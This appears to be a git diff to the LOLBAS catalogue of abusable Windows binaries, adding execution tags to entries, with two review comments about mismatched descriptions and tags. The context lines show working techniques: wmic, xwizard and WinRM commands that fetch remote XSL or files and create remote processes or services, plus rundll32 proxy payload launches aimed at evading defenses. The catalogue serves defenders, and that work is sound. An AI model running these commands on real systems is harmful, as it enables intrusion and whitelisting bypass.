@@ -11,8 +11,6 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - Tags: - - Execute: WSH - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -20,8 +18,6 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - Tags: - - Execute: WSH Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index cf8fa722f..55724dbfb 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.012 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: COM Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index 6bec321ac..6fa837fe9 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index f5ad51eba..f914071fe 100644 --- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml 
@@ -11,6 +11,9 @@ Commands: Privileges: Local Administrator - required to enable local manifest setting MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Remote + - Execute: EXE - Command: winget.exe install --accept-package-agreements -s msstore [name or ID] Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 9ceccc762..913ce053d 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\wlrmdr.exe Code_Sample: diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 8c1a996e1..5cb953cb8 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: wmic.exe process call create calc Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system 
@@ -25,6 +29,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: Remote - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Create a volume shadow copy of NTDS.dit that can be copied. Usecase: Execute binary on remote system @@ -32,6 +39,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: XSL + - Execute: Remote - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system @@ -40,7 +50,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: XSL + - Execute: Remote - Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe" Description: Copy file from source to destination. Usecase: Copy file. diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index ef8045c9e..d2dd19a88 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\WorkFolders.exe Detection: diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 549b60965..f7fbc3cc9 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml 
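Review bot: The `wmic.exe process get brief /format:"https://raw.githubusercontent.com/.../Wmic_calc.xsl"` entry, which the fourth Wmic.yml hunk tags with `- Execute: XSL` and `- Execute: Remote`, still carries the description `Create a volume shadow copy of NTDS.dit that can be copied.`, which has nothing to do with an XSL stylesheet and looks like a copy-paste leftover. Since this commit already touches that entry, the description should be corrected in passing, e.g. to the wording used by the next entry, `Executes JScript or VBScript embedded in the target remote XSL stylesheet.`; that next entry's description also misspells it as `stylsheet`. Both lines are context lines here, so a separate small hunk would be needed.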
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: COM - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: COM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 7bfe43d66..b6204bf04 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -27,6 +27,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml Acknowledgement: diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index 83f76cda7..57a163a75 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml 
@@ -11,6 +11,8 @@ Commands: Privileges: Low privileges MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe Detection: diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index 7b54dacdc..b83e0e7ed 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection: diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index b09f76a07..f445a41a6 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml 
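Review bot: In msedgewebview2.yml the first hunk adds `- Execute: EXE` to an entry whose Command line is above the hunk, while the three visible entries (`--utility-cmd-prefix="calc.exe"`, `--gpu-launcher="calc.exe"`, `--renderer-cmd-prefix="calc.exe"`) all get `- Execute: CMD`, even though every one of them carries the identical description "will spawn calc.exe as its subprocess". Whichever tag is correct for a switch that names a program to launch, the four entries describe the same behaviour and should be tagged the same way; if the first entry's Command differs in kind, that is not visible from this diff and is worth a second look.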
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: INF - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. @@ -19,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: rundll32.exe advpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. @@ -36,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. @@ -43,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\advpack.dll - Path: c:\windows\syswow64\advpack.dll diff --git a/yml/OSLibraries/Desk.yml b/yml/OSLibraries/Desk.yml index 163badf06..935a6f567 100644 --- a/yml/OSLibraries/Desk.yml +++ b/yml/OSLibraries/Desk.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. 
@@ -18,6 +20,9 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
+ - Execute: Remote
 Full_Path:
 - Path: C:\Windows\System32\desk.cpl
 - Path: C:\Windows\SysWOW64\desk.cpl
diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml
index 36fd9d9a5..3796255a3 100644
--- a/yml/OSLibraries/Dfshim.yml
+++ b/yml/OSLibraries/Dfshim.yml
@@ -11,6 +11,9 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: ClickOnce
+ - Execute: Remote
 Full_Path:
 - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
 - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml
index 5b745646d..bda0f4cb9 100644
--- a/yml/OSLibraries/Ieadvpack.yml
+++ b/yml/OSLibraries/Ieadvpack.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: INF
 - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
 Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
 Usecase: Run local or remote script(let) code through INF file specification.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: INF
 - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
 Description: Launch a DLL payload by calling the RegisterOCX function.
 Usecase: Load a DLL payload.
@@ -34,6 +38,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
 Description: Launch command line by calling the RegisterOCX function.
 Usecase: Run an executable payload.
@@ -41,6 +47,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: CMD
 Full_Path:
 - Path: c:\windows\system32\ieadvpack.dll
 - Path: c:\windows\syswow64\ieadvpack.dll
diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml
index 5bcb8b4c1..e75c0a688 100644
--- a/yml/OSLibraries/Ieframe.yml
+++ b/yml/OSLibraries/Ieframe.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: URL
 Full_Path:
 - Path: c:\windows\system32\ieframe.dll
 - Path: c:\windows\syswow64\ieframe.dll
diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml
index 576dd0971..a7701fe92 100644
--- a/yml/OSLibraries/Mshtml.yml
+++ b/yml/OSLibraries/Mshtml.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: HTA
 Full_Path:
 - Path: c:\windows\system32\mshtml.dll
 - Path: c:\windows\syswow64\mshtml.dll
diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml
index 61fd91960..407d41c54 100644
--- a/yml/OSLibraries/Pcwutl.yml
+++ b/yml/OSLibraries/Pcwutl.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: c:\windows\system32\pcwutl.dll
 - Path: c:\windows\syswow64\pcwutl.dll
diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml
index e5b6ccc24..b6836b624 100644
--- a/yml/OSLibraries/Setupapi.yml
+++ b/yml/OSLibraries/Setupapi.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
 Tags:
- - Input: INF
+ - Execute: INF
 - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
 Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
 Usecase: Load an executable payload.
@@ -21,7 +21,7 @@ Commands:
 MitreID: T1218.011
 OperatingSystem: Windows
 Tags:
- - Input: INF
+ - Execute: INF
 Full_Path:
 - Path: c:\windows\system32\setupapi.dll
 - Path: c:\windows\syswow64\setupapi.dll
diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml
index e7ab9a087..52e973e9b 100644
--- a/yml/OSLibraries/Shdocvw.yml
+++ b/yml/OSLibraries/Shdocvw.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: URL
 Full_Path:
 - Path: c:\windows\system32\shdocvw.dll
 - Path: c:\windows\syswow64\shdocvw.dll
diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml
index 97e10ab8e..48488674d 100644
--- a/yml/OSLibraries/Shell32.yml
+++ b/yml/OSLibraries/Shell32.yml
@@ -20,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
 Description: Launch command line by calling the ShellExec_RunDLL function.
 Usecase: Run an executable payload.
@@ -27,6 +29,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: CMD
 Full_Path:
 - Path: c:\windows\system32\shell32.dll
 - Path: c:\windows\syswow64\shell32.dll
diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml
index ac5cce271..3b01659c0 100644
--- a/yml/OSLibraries/Syssetup.yml
+++ b/yml/OSLibraries/Syssetup.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
 Tags:
- - Input: INF
+ - Execute: INF
 - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
 Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
 Usecase: Load an executable payload.
@@ -21,7 +21,7 @@ Commands:
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
 Tags:
- - Input: INF
+ - Execute: INF
 Full_Path:
 - Path: c:\windows\system32\syssetup.dll
 - Path: c:\windows\syswow64\syssetup.dll
diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml
index 8e7a0702f..608f69d35 100644
--- a/yml/OSLibraries/Url.yml
+++ b/yml/OSLibraries/Url.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: HTA
 - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"
 Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
 Usecase: Load an executable payload by calling a .url file with or without quotes.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: URL
 - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
 Description: Launch an executable by calling OpenURL.
 Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
@@ -25,6 +29,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe
 Description: Launch an executable by calling FileProtocolHandler.
 Usecase: Launch an executable.
@@ -32,6 +38,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
 Description: Launch an executable by calling FileProtocolHandler.
 Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
@@ -39,6 +47,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
 Description: Launch a HTML application payload by calling FileProtocolHandler.
 Usecase: Invoke an HTML Application via mshta.exe (Default Handler).
@@ -46,6 +56,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: HTA
 Full_Path:
 - Path: c:\windows\system32\url.dll
 - Path: c:\windows\syswow64\url.dll
diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml
index e107b5e6d..a7c1355db 100644
--- a/yml/OSLibraries/Zipfldr.yml
+++ b/yml/OSLibraries/Zipfldr.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
 Description: Launch an executable payload by calling RouteTheCall (obfuscated).
 Usecase: Launch an executable.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: c:\windows\system32\zipfldr.dll
 - Path: c:\windows\syswow64\zipfldr.dll
diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml
index 4298de424..a57f1b994 100644
--- a/yml/OSScripts/CL_LoadAssembly.yml
+++ b/yml/OSScripts/CL_LoadAssembly.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1216
 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
 Tags:
- - Execute: DLL
+ - Execute: DLL (.NET)
 Full_Path:
 - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
 Code_Sample:
diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml
index 37099e571..b23da74c9 100644
--- a/yml/OSScripts/CL_mutexverifiers.yml
+++ b/yml/OSScripts/CL_mutexverifiers.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1216
 OperatingSystem: Windows 10
+ Tags:
+ - Execute: PowerShell
 Full_Path:
 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml
index c7b884d24..963cf0ba9 100644
--- a/yml/OSScripts/Cl_invocation.yml
+++ b/yml/OSScripts/Cl_invocation.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1216
 OperatingSystem: Windows 10
+ Tags:
+ - Execute: CMD
 Full_Path:
 - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
 - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
diff --git a/yml/OSScripts/Launch-VsDevShell.yml b/yml/OSScripts/Launch-VsDevShell.yml
index d5bb9b2a0..72d32fb04 100644
--- a/yml/OSScripts/Launch-VsDevShell.yml
+++ b/yml/OSScripts/Launch-VsDevShell.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1216
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; calc.exe ;"'
 Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag.
 Usecase: Proxy execution
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1216
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1
 - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1
diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml
index cf3c4b7f5..4b1441c1e 100644
--- a/yml/OSScripts/Manage-bde.yml
+++ b/yml/OSScripts/Manage-bde.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1216
 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
 Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
 Usecase: Proxy execution from script
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1216
 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Windows\System32\manage-bde.wsf
 Code_Sample:
diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml
index d913b862f..18985ac4c 100644
--- a/yml/OSScripts/Pubprn.yml
+++ b/yml/OSScripts/Pubprn.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1216.001
 OperatingSystem: Windows 10
+ Tags:
+ - Execute: SCT
 Full_Path:
 - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
 - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml
index 64ef7b93f..7f71efb73 100644
--- a/yml/OSScripts/Syncappvpublishingserver.yml
+++ b/yml/OSScripts/Syncappvpublishingserver.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1216.002
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: PowerShell
 Full_Path:
 - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
 Detection:
diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml
index 26109da68..cb86feb91 100644
--- a/yml/OSScripts/UtilityFunctions.yml
+++ b/yml/OSScripts/UtilityFunctions.yml
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1216
 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
 Tags:
- - Execute: DLL
+ - Execute: DLL (.NET)
 Full_Path:
 - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
 Code_Sample:
diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml
index ecfee7e29..7e375cc0d 100644
--- a/yml/OSScripts/Winrm.yml
+++ b/yml/OSScripts/Winrm.yml
@@ -11,6 +11,9 @@ Commands:
 Privileges: User
 MitreID: T1216
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: CMD
+ - Execute: Remote
 - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
 Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
 Usecase: Proxy execution
@@ -18,6 +21,9 @@ Commands:
 Privileges: Admin
 MitreID: T1216
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: CMD
+ - Execute: Remote
 - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
 Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.
 Usecase: Execute arbitrary, unsigned code via XSL script
@@ -25,6 +31,8 @@ Commands:
 Privileges: User
 MitreID: T1220
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: XSL
 Full_Path:
 - Path: C:\Windows\System32\winrm.vbs
 - Path: C:\Windows\SysWOW64\winrm.vbs
diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml
index 237afa951..c8b1d9f59 100644
--- a/yml/OSScripts/pester.yml
+++ b/yml/OSScripts/pester.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1216
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: Pester.bat ;calc.exe
 Description: Execute code using Pester. Example here executes calc.exe
 Usecase: Proxy execution
@@ -18,13 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1216
 OperatingSystem: Windows 10, Windows 11
- - Command: Pester.bat ;calc.exe
- Description: Execute code using Pester. Example here executes calc.exe
- Usecase: Proxy execution
- Category: Execute
- Privileges: User
- MitreID: T1216
- OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\\bin\Pester.bat
 Code_Sample:
